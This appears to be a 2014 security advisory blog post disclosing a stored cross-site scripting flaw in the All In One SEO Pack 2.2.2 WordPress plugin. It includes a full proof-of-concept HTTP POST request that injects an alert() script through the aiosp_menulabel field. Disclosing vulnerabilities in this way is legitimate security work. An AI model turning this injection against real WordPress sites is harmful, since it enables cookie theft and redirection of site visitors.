Wednesday, August 13, 2014

All In One SEO Pack v.2.2.2 Stored XSS



Author: 1N3
Website: http://xerosecurity.com
Vender Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2

ABOUT:

All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. A malicious author or admin of a site could use this flaw to secretly redirect users of a site to a malicious site or steal session cookies of other users.


NOTE: User must have the ability to publish pages in the affected Wordpress site (usually Author or Admin roles required).

POC:
http://localhost/wordpress/wp-admin/post.php?post_type=page

Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1
Content-Type=application/x-www-form-urlencoded
Content-Length=1856

POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E

1 comment: